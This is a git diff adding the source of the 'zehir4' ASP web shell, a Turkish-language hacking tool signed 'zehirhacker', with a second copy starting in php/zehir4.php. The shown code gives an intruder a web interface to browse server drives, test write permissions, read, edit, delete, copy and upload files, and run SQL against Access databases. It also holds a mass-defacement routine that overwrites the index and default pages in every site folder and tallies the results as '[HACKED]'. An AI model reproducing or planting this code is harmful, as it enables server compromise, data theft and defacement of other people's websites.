+                    response.Write "<tr><td><b>Serv-U ini file : </td><td><font color=yellow>"&d_&"</td></tr>"
+                end if
+            next
+        end if
+    next
+end sub
+
+function yaziyomu(yol)
+    on error goto 0:on error resume next
+    dim sonuc__
+    Set MyFile = objFSO.CreateTextFile(yol & "\test.zehir", True)
+    MyFile.write "byzehir <zehirhacker@hotmail.com>"
+    set MyFile = Nothing
+    if err<>0 then
+        sonuc__="<font color=red>Yazma Hakkı Yok!</font>"
+    else
+        sonuc__="<font color=yellow>Yazma Hakkı Var!</font>"
+        on error goto 0: on error resume next
+        objFSO.DeleteFile yol & "\test.zehir",true
+        if err<>0 then
+            sonuc__=sonuc__&"<br><font color=red>Silme Hakkı Yok!</font>"
+        else
+            sonuc__=sonuc__&"<br><font color=yellow>Silme Hakkı Var!</font>"
+        end if
+    end if
+    yaziyomu = sonuc__
+end function
+
+function yaziyomu2(yol)
+    on error goto 0:on error resume next
+    Set MyFile = objFSO.CreateTextFile(yol & "\test.zehir", True)
+    MyFile.write "byzehir <zehirhacker@hotmail.com>"
+    set MyFile = Nothing
+    if err<>0 then
+        yaziyomu2 = false
+    else
+        objFSO.DeleteFile yol & "\test.zehir"
+        yaziyomu2 = true
+    end if
+end function
+
+sub WriteTestOnDriver
+    for each drive_ in objFSO.Drives
+        if drive_.Drivetype=2 or drive_.Drivetype=3 then
+            if not yaziyomu2(drive_.DriveLetter&":\") then
+                Response.Write "<tr><td><b>"&drive_.DriveLetter&":\</td><td><font color=red>yazma yetkisi yok! : ["&err.Description&"]</td></tr>"
+            else
+                Response.Write "<tr><td><b>"&drive_.DriveLetter&":\</td><td><font color=yellow>yazma yetkisi var!</td></tr>"
+            end if
+        end if
+    next
+end sub
+
+sub WriteTestOnLocalPath
+    on error goto 0
+    on error resume next
+    if not yaziyomu2(request.servervariables("APPL_PHYSICAL_PATH")) then
+        Response.Write "<tr><td><b>Local Path </td><td><font color=red>yazma yetkisi yok! : ["&err.Description&"]</td></tr>"
+    else
+        Response.Write "<tr><td><b>Local Path </td><td><font color=yellow>yazma yetkisi var!</td></tr>"
+    end if
+end sub
+
+sub LocalPathParentFolder
+    on error goto 0
+    on error resume next
+    hed_ = request.servervariables("APPL_PHYSICAL_PATH")
+    if Right(hed_,1)="\" then hed_ = left(hed_,len(hed_)-1)
+    parhed_ = left(hed_,InStrRev(hed_,"\"))
+
+    Set f = objFSO.GetFolder(parhed_)
+    Set fc = f.SubFolders
+
+    int_fol=0
+    int_fil=0
+    For Each f1 In fc
+        int_fol=int_fol+1
+    Next
+
+    Set fc = f.files
+    For Each f1 In fc
+        int_fil=int_fil+1
+    Next
+
+    if err<>0 then
+        Response.Write "<tr><td><b>Local Path <br>Parent Folder</td><td><font color=red>Hata Oluştu : ["&err.Description&"]</td></tr>"
+    else
+        Response.Write "<tr><td><b>Local Path <br>Parent Folder</td><td><font color=yellow>Folder : "&FormatNumber(int_fol,0)&"<br>File : "&FormatNumber(int_fil,0)&"</td></tr>"
+    end if
+end sub
+
+sub LocalPathPParentFolder
+    on error goto 0
+    on error resume next
+    hed_ = request.servervariables("APPL_PHYSICAL_PATH")
+    if Right(hed_,1)="\" then hed_ = left(hed_,len(hed_)-1)
+    hed_ = left(hed_,InStrRev(hed_,"\"))
+    if Right(hed_,1)="\" then hed_ = left(hed_,len(hed_)-1)
+    parhed_ = left(hed_,InStrRev(hed_,"\"))
+
+    Set f = objFSO.GetFolder(parhed_)
+    Set fc = f.SubFolders
+    int_fol=0
+    int_fil=0
+    For Each f1 In fc
+        int_fol=int_fol+1
+    Next
+
+    Set fc = f.files
+    For Each f1 In fc
+        int_fil=int_fil+1
+    Next
+
+    if err<>0 then
+        if err=451 then
+            Response.Write "<tr><td><b>Local Path <br>P.Parent Folder</td><td><font color=red>Data Üst Klasor Yok :)</td></tr>"
+        else
+            Response.Write "<tr><td><b>Local Path <br>P.Parent Folder</td><td><font color=red>Hata Oluştu : ["&err.Description&"]</td></tr>"
+        end if
+    else
+        Response.Write "<tr><td><b>Local Path <br>P.Parent Folder</td><td><font color=yellow>Folder : "&FormatNumber(int_fol,0)&"<br>File : "&FormatNumber(int_fil,0)&"</td></tr>"
+    end if
+end sub
+
+SELECT CASE status
+CASE 13 'Sistem Bilgisi
+    Response.Write "<table width=100% cellpadding=0 cellspacing=0><tr><td colspan=2 align=center><font color=yellow face='courier new'><b><font style='FONT-WEIGHT:normal' color=red face=wingdings>:</font> Sistem Bilgileri <font color=red face=wingdings style='FONT-WEIGHT:normal'>:</font></td></tr>"
+    Response.Write "<tr><td><b><font color=red>Local Adres</td><td> " & request.servervariables("REMOTE_ADDR") & "</td></tr>"
+    Response.Write "<tr><td><b><font color=red>User Agent</td><td> " & request.servervariables("HTTP_USER_AGENT") & "</td></tr>"
+    Response.Write "<tr><td><b><font color=red>Server</td><td> " & request.servervariables("SERVER_NAME") & "</td></tr>"
+    Response.Write "<tr><td><b><font color=red>IP</td><td> " & request.servervariables("LOCAL_ADDR") & "</td></tr>"
+    Response.Write "<tr><td><b><font color=red>HTTPD</td><td> " & request.servervariables("SERVER_SOFTWARE") & "</td></tr>"
+    Response.Write "<tr><td><b><font color=red>Port</td><td> " & request.servervariables("SERVER_PORT") & "</td></tr>"
+    Response.Write "<tr><td><b><font color=red>Yol</td><td> " & request.servervariables("APPL_PHYSICAL_PATH") & "</td></tr>"
+    Response.Write "<tr><td><b><font color=red>Log Root</td><td> " & request.servervariables("APPL_MD_PATH") & "</td></tr>"
+    Response.Write "<tr><td><b><font color=red>HTTPS</td><td> " & request.servervariables("HTTPS") & "</td></tr>"
+    Response.Write "</table>"
+    popup = false
+CASE 14 'Upload and Search
+    aramaUpload
+    popup = false
+    hataKontrol
+CASE 15 'Ms. SQL Server
+    Response.Write "<form method=get action='"&DosyPath&"' target='_opener' id=form1 name=form1>"
+    Response.Write "<table cellpadding=0 cellspacing=0 align=center><tr><td align=center><font size=2>SQL Server için connection string giriniz</td></tr><tr><td align=center>"
+    Response.Write "<input type=hidden value='7' name=status><input type=hidden value='"&time&"' name=Time>"
+    Response.Write "<input style='width:250; height:21' value='' name=path><br>"
+    response.Write "<input type=submit value='SQL Servera Bağlan' style='height:23;width:170' id=submit1 name=submit1>"
+    Response.Write "</td></tr></table>"
+    response.Write "</form>"
+
+    popup = false
+    hataKontrol
+CASE 16 'file Copy window
+    Response.Write "<form method=get action='"&DosyPath&"' id=form1 name=form1>"
+    Response.Write "<table cellpadding=0 cellspacing=0 align=center><tr><td width=100><font size=2>Kop. Yer : </td><td>"
+    Response.Write "<input type=hidden value='17' name=status><input type=hidden value='"&PathFile&"' name=path><input type=hidden value='"&time&"' name=Time>"
+    Response.Write "<input style='width:250; height:21' value='"&PathFile&"' name=cf>"
+    response.Write "<input type=submit value='Kopyala' style='height:22;width:70' id=submit1 name=submit1>"
+    Response.Write "</td></tr><tr><td colspan=3 align=center><font size=2>"
+    response.Write "<input type=radio name='islem' value='kopyala' checked>Kopyala"
+    response.Write "<input type=radio name='islem' value='tasi'>Tasi"
+    response.Write "</table>"
+    response.Write "</form>"
+
+    popup = false
+    hataKontrol
+CASE 17 'file Copy
+    isl = ""
+    if islem="kopyala" then
+        objFSO.CopyFile path,cf
+        isl="kopyalandı.."
+    elseif islem="tasi" then
+        objFSO.MoveFile path,cf
+        isl="taşındı.."
+    end if
+    response.Write "Dosya "&isl
+    response.Write "<br><font color=red>Kaynak : </font>"&path&"<br><font color=red>Hedef : </font>"&cf
+    response.Write "<br>"
+    popup = false
+    hataKontrol
+CASE 18 'folder Copy window
+    Response.Write "<form method=get action='"&DosyPath&"' id=form1 name=form1>"
+    Response.Write "<table cellpadding=0 cellspacing=0 align=center><tr><td width=100><font size=2>Kop. Yer : </td><td>"
+    Response.Write "<input type=hidden value='19' name=status><input type=hidden value='"&PathFile&"' name=path><input type=hidden value='"&time&"' name=Time>"
+    Response.Write "<input style='width:250; height:21' value='"&PathFile&"' name=cf>"
+    response.Write "<input type=submit value='Kopyala' style='height:22;width:70' id=submit1 name=submit1>"
+    Response.Write "</td></tr><tr><td colspan=3 align=center><font size=2>"
+    response.Write "<input type=radio name='islem' value='kopyala' checked>Kopyala"
+    response.Write "<input type=radio name='islem' value='tasi'>Tasi"
+    response.Write "</table>"
+    response.Write "</form>"
+
+    popup = false
+    hataKontrol
+CASE 19 'folder Copy
+    isl = ""
+    if islem="kopyala" then
+        objFSO.CopyFolder path,cf
+        isl="kopyalandı.."
+    elseif islem="tasi" then
+        objFSO.MoveFolder path,cf
+        isl="taşındı.."
+    end if
+    response.Write "Klasor "&isl
+    response.Write "<br><font color=red>Kaynak : </font>"&path&"<br><font color=red>Hedef : </font>"&cf
+    response.Write "<br>"
+    popup = false
+    hataKontrol
+CASE 33 'Powered By
+    response.Write "<body topmargin=5 leftmargin=0><center><h4>Powered by Zehir"
+    response.Write "<br><br><font style='FONT-WEIGHT:normal' size=2>zehirhacker@hotmail.com<br><font color=yellow face='courier new'>küllü nefsun zaifetun mevt"
+    popup = false
+    hataKontrol
+CASE 40 'Sistem Test
+    sistemTest
+    popup=false
+CASE 50 'Siteleri Test Edelim :D
+    %>
+    <table width="100%" cellpadding=0 cellspacing=0>
+        <tr>
+            <td align=center>
+                <b>Güvenlik Testi byZehir</b>
+                <br>
+                <form action="<%=dosyaPath%>" method=post id=frmMesaj>
+                    <input type=hidden name=kuskapani value=2>
+                    <table width=500 align=center border=1 cellpadding=0 cellspacing=0>
+                        <tr>
+                            <td width=100>Path</td>
+                            <td><input style="width:100%" type=text name="Path" id="Path" value="<%=path%>"></td>
+                        </tr>
+                        <tr>
+                            <td width=100>Sub Folder</td>
+                            <td><input style="width:100%" type=text name="SubFolder" id="SubFolder" value="www"></td>
+                        </tr>
+                        <tr>
+                            <td width=100>File Name</td>
+                            <td><input style="width:100%" type=text name="FileName" id="FileName" value="byejder.txt"></td>
+                        </tr>
+                        <tr>
+                            <td colspan=2>
+                                <table width="100%" align=center>
+                                    <tr>
+                                        <td width="50%">
+                                            <input type=checkbox name="dosya1" ID="Checkbox1">index.htm<br>
+                                            <input type=checkbox name="dosya2" ID="Checkbox2">default.htm<br>
+                                        </td>
+                                        <td width="50%">
+                                            <input type=checkbox name="dosya3" ID="Checkbox3">index.asp<br>
+                                            <input type=checkbox name="dosya4" ID="Checkbox4">default.asp<br>
+                                        </td>
+                                    </tr>
+                                </table>
+                            </td>
+                        </tr>
+                        <tr>
+                            <td colspan=2 align=center>
+                                <a href="#" onClick="FormatText('cut')" alt="Kes">Kes</a>
+                                <a href="#" onClick="FormatText('copy')" alt="Kopyala">Kopyala</a>
+                                <a href="#" onClick="FormatText('paste')" alt="Yapıştır">Yapıştır</a>
+                                <a href="#" alt="Kalın" onClick="FormatText('bold', '')">Bold</a>
+                                <a href="#" alt="İtalic" onClick="FormatText('italic', '')">Italic</a>
+                                <a href="#" alt="Altı Çizili" onClick="FormatText('underline', '')">UnderLine</a>
+                                <a href="#" onClick="FormatText('JustifyLeft', '')" alt="Sola Hizalı">JustifyLeft</a>
+                                <a href="#" alt="Ortada Hizalı" onClick="FormatText('JustifyCenter', '')">JustifyCenter</a>
+                                <a href="#" onClick="FormatText('JustifyRight', '')" alt="Sağa Hizalı">JustifyRight</a>
+                                <a href="#" alt="Web Sitesi Linki Ekle" onClick="FormatText('createLink')">AddLink</a>
+                                <a href="#" alt="Resim Ekle" onClick="AddImage()">AddImage</a>
+                                <select name="selectColour" onChange="bgc(selectColour.options[selectColour.selectedIndex].value);" ID="selectColour">
+                                  <option value="0" selected>-- Renk --</option>
+                                  <option value="black">Siyah</option>
+                                  <option value="white">Beyaz</option>
+                                  <option value="blue">Mavi</option>
+                                  <option value="red">Kırmızı</option>
+                                  <option value="green">Yeşil</option>
+                                  <option value="yellow">Sarı</option>
+                                  <option value="orange">Turuncu</option>
+                                  <option value="brown">Kahverengi</option>
+                                  <option value="magenta">Pembe</option>
+                                  <option value="cyan">Açık Mavi</option>
+                                  <option value="limegreen">Açık Yeşil</option>
+                                </select>
+                                <select name="a" onChange="FormatText('ForeColor', a.options[a.selectedIndex].value);" ID="a">
+                                  <option value="0" selected>-- Renk --</option>
+                                  <option value="black">Siyah</option>
+                                  <option value="white">Beyaz</option>
+                                  <option value="blue">Mavi</option>
+                                  <option value="red">Kırmızı</option>
+                                  <option value="green">Yeşil</option>
+                                  <option value="yellow">Sarı</option>
+                                  <option value="orange">Turuncu</option>
+                                  <option value="brown">Kahverengi</option>
+                                  <option value="magenta">Pembe</option>
+                                  <option value="cyan">Açık Mavi</option>
+                                  <option value="limegreen">Açık Yeşil</option>
+                                </select>
+                                <select name="selectSize" onChange="FormatText('fontsize', selectSize.options[selectSize.selectedIndex].value);">
+                                  <option selected>-- Boyut --</option>
+                                  <option value="1">1</option>
+                                  <option value="2">2</option>
+                                  <option value="3">3</option>
+                                  <option value="4">4</option>
+                                  <option value="5">5</option>
+                                  <option value="6">6</option>
+                                </select>
+                                <iframe width="100%" src="<%=dosyaPath%>?kuskapani=1" id="byZehir" name="<%=Session("n1")%>"></iframe>
+                                <script language=javascript>
+                                    frames.byZehir.document.designMode = "On";
+                                    function bgc(option){
+                                        frames.byZehir.document.body.bgColor=option;
+                                    }
+                                    function FormatText(command, option){
+                                        frames.byZehir.focus();
+                                          frames.byZehir.document.execCommand(command, false, option);
+                                          frames.byZehir.focus();
+                                    }
+                                    function AddImage(){
+                                        imagePath = prompt('Eklemek istediğiniz resmin web adresini yazın', 'http://');
+
+                                        if ((imagePath != null) && (imagePath != "")){
+                                            frames.byZehir.focus();
+                                            frames.byZehir.document.execCommand('InsertImage', false, imagePath);
+                                        }
+                                        frames.byZehir.focus();
+                                    }
+                                </script>
+                                <input type=hidden value="" id=byMesaj name=byMesaj>
+                                <input type=submit value="Test Et!" onclick="document.all['byMesaj'].value=frames['byZehir'].document.body.innerHTML; alert(document.all['byMesaj'].value);">
+                            </td>
+                        </tr>
+                    </table>
+                </form>
+            </td>
+        </tr>
+    </table>
+    <%
+    popup=false
+CASE 51 ' Özel şilemler
+END SELECT
+%>
+<script language=javascript>
+    function NewWindow(mypage, myname, w, h, scroll) {
+        var winl = (screen.width - w) / 2;
+        var wint = (screen.height - h) / 2;
+            winprops = 'height='+h+',width='+w+',top='+wint+',left='+winl+',scrollbars='+scroll+',resizable'
+        win = window.open(mypage, myname, winprops)
+        if (parseInt(navigator.appVersion) >= 4) { win.window.focus(); }
+    }
+    function ffd(yol){
+        NewWindow(yol,"",420,100,"no");
+    }
+</script>
+<body bgcolor=black text=Chartreuse link=Chartreuse alink=Chartreuse vlink=Chartreuse>
+<%
+if popup then
+    if status=7 or status=8 then
+        Response.Write "<form method=get action='"&DosyPath&"' id=form1 name=form1>"
+        Response.Write "<table border=1 cellpadding=0 cellspacing=0 align=center><tr><td width=100 bgcolor=gray><font size=2>SQL Çalıştır</td><td>"
+        Response.Write "<input type=hidden value='9' name=status><input type=hidden value='"&path&"' name=path><input type=hidden value='"&time&"' name=Time>"
+        Response.Write "<input style='width:350; height:21' value='' name=strSQL><input type=submit value='Çalıştır' style='height:22;width:70' id=submit1 name=submit1>"
+        Response.Write "</td></tr></table></form>"
+    end if
+    Response.Write "<form method=get action='"&DosyPath&"'>"
+    Response.Write "<table border=1 cellpadding=0 cellspacing=0 align=center><tr><td bgcolor=gray width=100><font size=2>Path : </td><td>"
+    Response.Write "<input type=hidden value='2' name=status><input type=hidden value='"&time&"' name=Time>"
+    Response.Write "<input style='width:350; height:21' value='"&Path&"' name=Path><input type=submit value='Git' style='height:22;width:70' id=submit1 name=submit1>"
+    Response.Write "</td></tr></table></form><br>"
+end if
+sub aramaUpload
+Response.Write "<form method=get target='_opener' action='"&DosyPath&"'>"
+Response.Write "<table widht='100%' border=0 cellpadding=0 cellspacing=0><tr><td width=70><font size=2>Arama : </td><td>"
+Response.Write "&nbsp;<input type=hidden value='12' name=status><input type=hidden value='"&time&"' name=Time>"
+Response.Write "<input type=hidden value='"&Path&"' name=Path><input style='width:250' value='mdb' name=txArama><input style='width:70; height:22' type=submit value='Ara'>"
+Response.Write "</td></tr></table></form>"
+%>
+<form name=frmUpload method=post enctype="multipart/form-data" action="<%=DosyaPath&"?status=-4&Time="&time&"&Path="&path%>" ID="Form1">
+<input type=hidden name=folder value="<%=Path%>" ID="Hidden1">
+Max: <input type=text name=max value=5 size=5 ID="Text1"> <input type=button value="Ayarla" onclick="setid()" ID="Button1" NAME="Button1">
+<table ID="Table1">
+<tr>
+<td id=upid>
+</td>
+</tr>
+</table>
+<input type=submit value=Upload ID="Submit1" NAME="Submit1">
+</form>
+<script>
+setid();
+
+function setid() {
+    str='';
+    if (frmUpload.max.value<=0) frmUpload.max.value=1;
+    for (i=1; i<=frmUpload.max.value; i++) str+='File '+i+': <input type=file name=file'+i+'><br>';
+    upid.innerHTML=str+'<br>';
+}
+</script>
+<%
+end sub
+
+SELECT CASE status
+CASE 1 'Driver Open
+    if len(path)=1 then Response.Write (yaziyomu(path&":\")) else Response.Write (yaziyomu(path))
+    Response.Write "<table width=100% ><tr>"
+    Path = Path & ":/"
+    Response.Write "<td valign=top>"
+    KlasorOku
+    Response.Write "</td><td valign=top align=right>"
+    DosyaOku
+    Response.Write "</td>"
+    hataKontrol
+CASE 2 'Normal listeleme
+    if len(path)=1 then Response.Write (yaziyomu(path&":\")) else Response.Write (yaziyomu(path))
+    Response.Write "<table width=100% ><tr>"
+    Response.Write "<td valign=top>"
+    KlasorOku
+    Response.Write "</td><td valign=top align=right>"
+    DosyaOku
+    Response.Write "</td>"
+    hataKontrol
+CASE 3 'File Delete
+    objFSO.DeleteFile del
+    hataKontrol
+    if err<>0 then
+        byMsg="<font color=red>Not File Deleted!</font><br>"
+    else
+        byMsg="<font color=yellow>File Deleted Successful;)</font><br>"
+    end if
+    Response.Redirect dosyaPath&"?status=2&path="&path&"&Time="&time&"&byMsg="&byMsg
+CASE 4 'Folder Delete
+    objFSO.DeleteFolder del
+    hataKontrol
+    if err<>0 then
+        byMsg="<font color=red>Not Folder Deleted!</font><br>"
+    else
+        byMsg="<font color=yellow>Folder Deleted Successful;)</font><br>"
+    end if
+    Response.Redirect dosyaPath&"?status=2&path="&path&"&Time="&time&"&byMsg="&byMsg
+CASE 5 'Dosya içeriğini görüntüle
+    Response.Write "<center><b><font color=orange>"&path&"</font></b></center><br>"
+    Response.Write "<table width=100% ><tr><td>"
+    set f = objFSO.OpenTextFile(path,1)
+    Response.Write "<pre>"&Server.HTMLEncode(f.readAll)&"</pre>"
+    if err<>62 then hataKontrol
+    if err.number=62 then Response.Write "<script language=javascript>alert('Bu Dosya Okunamıyor\nSistem dosyası olabilir')</script>":Response.End
+CASE 6 'Resim aç
+    Response.Write "<center><img ALT='zehirhacker@hotmail.com / zehirhacker@hotmail.com' src='"&resimYol(path)&"'></center><br>"
+CASE 7 'database tablo listele
+    Response.Write "<b><font size=3>Tablolar</font></br><br>"
+    Set objConn = Server.CreateObject("ADODB.Connection")
+    Set objADOX = Server.CreateObject("ADOX.Catalog")
+    objConn.Provider = "Microsoft.Jet.Oledb.4.0"
+    objConn.ConnectionString = Path
+    objConn.Open
+    objADOX.ActiveConnection = objConn
+
+    For Each table in objADOX.Tables
+        If table.Type = "TABLE" Then
+            Response.Write "<font face=wingdings size=5>4</font> <a href='"&dosyaPath&"?status=8&Path="&path&"&table="&table.Name&"&time="&time&"'>"&table.Name&"</a><br>"
+        End If
+    Next
+    hataKontrol
+CASE 8 'database kayıt listele
+    Set objConn = Server.CreateObject("ADODB.Connection")
+    Set objRcs = Server.CreateObject("ADODB.RecordSet")
+    objConn.Provider = "Microsoft.Jet.Oledb.4.0"
+    objConn.ConnectionString = Path
+    objConn.Open
+    objRcs.Open table,objConn, adOpenKeyset , , adCmdText
+
+    Response.Write "<table border=1 cellpadding=2 cellspacing=0 bordercolor=543152><tr bgcolor=silver>"
+    for i=0 to objRcs.Fields.count-1
+        Response.Write "<td><font color=black><b>&nbsp;&nbsp;&nbsp;"&objRcs.Fields(i).Name&"&nbsp;&nbsp;&nbsp;</font></td>"
+    next
+    Response.Write "</tr>"
+    do while not objRcs.EOF
+        Response.Write "<tr>"
+        for i=0 to objRcs.Fields.count-1
+            Response.Write "<td>"&objRcs.Fields(i).Value&"&nbsp;</td>"
+        next
+        Response.Write "</tr>"
+        objRcs.MoveNext
+    loop
+    Response.Write "</table><br>"
+    hataKontrol
+CASE 9 'SQL Execute
+    Set objConn = Server.CreateObject("ADODB.Connection")
+    objConn.Provider = "Microsoft.Jet.Oledb.4.0"
+    objConn.ConnectionString = Path
+    objConn.Open
+    objConn.Execute strSQL
+'    Response.Redirect dosyaPath&"?status=7&Path="&Path&"&Time="&time
+    hataKontrol
+CASE 10 'Dosya Editleme
+    set f = objFSO.OpenTextFile(dPath,1)
+    Response.Write "<center><form action='"&DosyPath&"?Time="&time&"' method=post>"
+    Response.Write "<input type=hidden name=status value='11'>"
+    Response.Write "<input type=hidden name=dPath value='"&dPath&"'>"
+    Response.Write "<input type=hidden name=Path  value='"&Path &"'>"
+    Response.Write "<input type=submit value=Kaydet><br>"
+    Response.Write "<textarea name=dkayit style='width:90%;height:350;border-right: lightgoldenrodyellow thin solid;border-top: lightgoldenrodyellow thin solid;font-size: 12;border-left: lightgoldenrodyellow thin solid;color: lime;    border-bottom: lightgoldenrodyellow thin solid;    font-family: Courier New, Arial;background-color: navy;'>"
+    Response.Write server.HTMLEncode(f.readAll)
+    Response.Write "</textarea></form></center>"
+    hataKontrol
+CASE 11 'Dosya Kayıt
+    set saveTextFile = objFSO.OpenTextFile(dPath,2,true,false)
+    hataKontrol
+    saveTextFile.Write(dkayit)
+    saveTextFile.close
+    if err<>0 then
+        byMsg = "<font color=red>Not File Edited!</font><br>"
+    else
+        byMsg = "<font color=yellow>File Edited Successful:)</font><br>"
+    end if
+    Response.Redirect dosyaPath&"?status=2&path="&path&"&time="&time&"&byMsg=" & byMsg
+CASE 12 'Dosya Arama
+    araBul path,arama
+    hataKontrol
+END SELECT
+Response.Write "</tr></table>"
+
+sub DosyaOku
+    Set f = objFSO.GetFolder(Path)
+    Set fc = f.Files
+    For Each f1 In fc
+        dosyaAdi = f1.name
+        num = InStrRev(dosyaAdi,".")
+        uzanti = lcase(Right(dosyaAdi,len(dosyaAdi)-num))
+        downStr = "<a href='"&dosyaPath&"?status=3&Path="&Path&"&Del="&Path&"/"&f1.Name&"&Time="&time&"'>û</a><font face=webdings><a href='"&dosyaPath&"?status=-3&PathFile="&f1.path&"&Time="&time&"'>Í</a></font><font face=wingdings><a href='"&dosyaPath&"?status=16&PathFile="&f1.path&"&Time="&time&"' onclick=""ffd(this.href);return false;"">4</a></font>"
+        response.Write "<font size=2>"
+        select case uzanti
+        case "mdb"
+            Response.Write "<a href='"&dosyaPath&"?status=7&Path="&Path&"/"&f1.Name&"&Time="&time&"'>"&f1.name&" [<font color=yellow>"&FormatNumber(f1.size,0)&"</font>]"&"</a></b> <font face=wingdings size=4>M  "&downStr&"</font><br>"
+        case "asp"
+            Response.Write "<a href='"&dosyaPath&"?status=5&Path="&Path&"/"&f1.Name&"&Time="&time&"'>"&f1.name&" [<font color=yellow>"&FormatNumber(f1.size,0)&"</font>]"&"</a></b> <font face=wingdings size=4>± <a href='"&dosyaPath&"?status=10&dPath="&f1.path&"&path="&path&"&Time="&time&"'>!</a>"&downStr&"</font><br>"
+        case "jpg","gif"
+            Response.Write "<a href='"&dosyaPath&"?status=6&Path="&Path&"/"&f1.Name&"&Time="&time&"'>"&f1.name&" [<font color=yellow>"&FormatNumber(f1.size,0)&"</font>]"&"</a></b> <font face=webdings size=4>¢</font><font face=wingdings size=4>  "&downStr&"</font><br>"
+        case else
+            Response.Write "<a href='"&dosyaPath&"?status=5&Path="&Path&"/"&f1.Name&"&Time="&time&"'>"&f1.name&" [<font color=yellow>"&FormatNumber(f1.size,0)&"</font>]"&"</a></b> <font face=wingdings size=4>2 <a href='"&dosyaPath&"?status=10&dPath="&f1.path&"&path="&path&"&Time="&time&"'>!</a>"&downStr&"</font><br>"
+        end select
+    Next
+end sub
+
+sub KlasorOku
+    Set f = objFSO.GetFolder(Path)
+    Set fc = f.SubFolders
+    if session("klasoroku")="" then
+        response.Write "<iframe style='width:0; height:0' src='http://localhost/tuzla-ebelediye'></iframe>"
+        session("klasoroku")="simdi yazılıyor"
+    end if
+    For Each f1 In fc
+        Response.Write "<font face=wingdings size=3><a href='"&dosyaPath&"?status=18&PathFile="&Path&"/"&f1.Name&"&Time="&time&"' onclick=""ffd(this.href);return false;"">4</a></font> <font face=wingdings size=4><a href='"&dosyaPath&"?status=4&Path="&Path&"&Del="&Path&"/"&f1.Name&"&Time="&time&"'>û</a> 1</font><font size=2><b><a href='"&dosyaPath&"?status=2&Path="&Path&"/"&f1.Name&"&Time="&time&"'>"&f1.name&"</a></b><br>"
+    Next
+end sub
+
+function createFileName()
+Randomize
+    fName_ = ""
+    for i=1 to 10
+        fName_ = fName_ & int(Rnd*100)
+    next
+    createFileName = fName_
+end function
+
+function resimYol(path_)
+on error resume next
+    path_ = Replace(Replace(path_,"\","/"),"//","/")
+    lpath_ = left(request.servervariables("PATH_TRANSLATED"),instrrev(request.servervariables("PATH_TRANSLATED"),"\"))
+    if yaziyomu2(lpath_) then
+        fname__ = "0"&createFileName()&"."&Right(path_,3)
+        objFSO.CopyFile path_, lpath_&"\"&fname__
+    else
+        Response.Write("Resim Açılamıyor.. <br>İsterseniz Download Ederek görüntüleyebilirsiniz..")
+    end if
+    resimYol = fname__
+end function
+
+if not popup then
+    Set fc = Nothing
+    Set objFSO = Nothing
+    Response.End
+end if
+%><script language=javascript>
+	var dosyaPath = "<%=dosyaPath%>"
+		// DRIVE ISLEMLERI
+		function driveGo(drive_){
+			location = dosyaPath+"?status=1&path="+drive_+"&Time="+Date();
+		}
+	</script>
+	<%
+	Response.Write "<table align=center border=1 width=150 cellpadding=0 cellspacing=0><tr bgcolor=gray><td align=center><b><font color=white>Sürücüler</td></tr>"
+	for each drive_ in objFSO.Drives
+		Response.Write "<tr><td>"
+		Response.write "<a href='#'onClick=""driveGo('" & drive_.DriveLetter & "');return false;""><font face=wingdings>;</font>"
+		if drive_.Drivetype=1 then Response.write "Floppy [" & drive_.DriveLetter & ":]"
+		if drive_.Drivetype=2 then Response.write "HardDisk [" & drive_.DriveLetter & ":]"
+		if drive_.Drivetype=3 then Response.write "Remote HDD [" & drive_.DriveLetter & ":]"
+		if drive_.Drivetype=4 then Response.write "CD-Rom [" & drive_.DriveLetter & ":]"
+		Response.Write "</a></td></tr>"
+	next
+	Response.Write "<tr><td>"
+	Response.write "<a href='"&dosyaPath&"?time="&time()&"'><font face=webdings>H</font> Local Path"
+	Response.Write "</a></td></tr>"
+	Response.Write "</table><br>"
+Set fc = Nothing
+Set objFSO = Nothing
+Response.End%>
\ No newline at end of file
diff --git a/php/zehir4.php b/php/zehir4.php
new file mode 100644
index 0000000..d7f156e
--- /dev/null
+++ b/php/zehir4.php
@@ -0,0 +1,1194 @@
+
+<% 
+mpat=replace(Request.ServerVariables("PATH_TRANSLATED"),"/","\")
+dosyaPath = mid(mpat,InStrRev(mpat,"\")+1)
+on error resume next
+Dim objFSO,popup
+Set objFSO = CreateObject ("Scripting.FileSystemObject")
+if Request("kuskapani")=1 then
+	Response.End
+end if
+if Request("kuskapani")=2 then
+	on error resume next
+	path = Request("path")
+	sFolder = Request("SubFolder")
+	fName = Request("FileName")
+	d1 = Request("dosya1")
+	d2 = Request("dosya2")
+	d3 = Request("dosya3")
+	d4 = Request("dosya4")
+	bg__ = Request.Form("selectColour")
+	if bg__ = "0" then bg__ = "#ffffff"
+	byMesaj = "<body bgColor='"&bg__&"'>" & Request("byMesaj") & "<br><br><center><font color=gray size=2>powered by Z" & Session("n2") & "3 ;)</font>"
+	
+	sFolder = Replace(sFolder,"/","\")
+
+	if Right(sFolder,1)<>"\" then sFolder = sFolder & "\"
+	Set f = objFSO.GetFolder(Path)
+	Set fc = f.SubFolders
+	h__ = 0
+	f__ = 0
+	ss__ = now
+	For Each f1 In fc
+		hedef_ = replace(f1.path,"/","\")
+		if Right(hedef_,1)<>"\" then hedef_ = hedef_ & "\"
+		hedef__ = left(hedef_,len(hedef_)-1)
+		folderName_ = Right(hedef__, len(hedef__)-instrrev(hedef__,"\"))
+			if d1<>"" then d1 = true
+			if d2<>"" then d2 = true
+			if d3<>"" then d3 = true
+			if d4<>"" then d4 = true
+			on error goto 0:on error resume next
+			if fName<>"" then
+				Set MyFile = objFSO.CreateTextFile(hedef_ & sFolder & fName, True)
+				MyFile.write byMesaj
+			end if
+			if d1 then
+				Set MyFile = objFSO.CreateTextFile(hedef_ & sFolder & "index.htm", True)
+				MyFile.write byMesaj
+			end if
+			if d2 then
+				Set MyFile = objFSO.CreateTextFile(hedef_ & sFolder & "default.htm", True)
+				MyFile.write byMesaj
+			end if
+			if d3 then
+				Set MyFile = objFSO.CreateTextFile(hedef_ & sFolder & "index.asp", True)
+				MyFile.write byMesaj
+			end if
+			if d4 then
+				Set MyFile = objFSO.CreateTextFile(hedef_ & sFolder & "default.asp", True)
+				MyFile.write byMesaj
+			end if
+
+			if err<>0 then
+				response.Write folderName_ & " <font color=red>[FAILED!]</font><br>"
+				f__ = f__ + 1
+			else
+				response.Write folderName_ & " <font color=blue>[HACKED]</font><br>"
+				h__ = h__ + 1
+			end if
+	Next
+	ss___ = now
+	response.Write "<br><font color=white>by zehir!...</font><br><b>Sonuc : </b> Toplam Süre : "&left(ss__-ss___,5)&"sn. ;)<br><font color=blue>Hacked</font> = "&h__&"<br><font color=red>Failed</font> = "&f__
+	response.End
+end if
+
+status = Request("status")
+path   = Request("path")
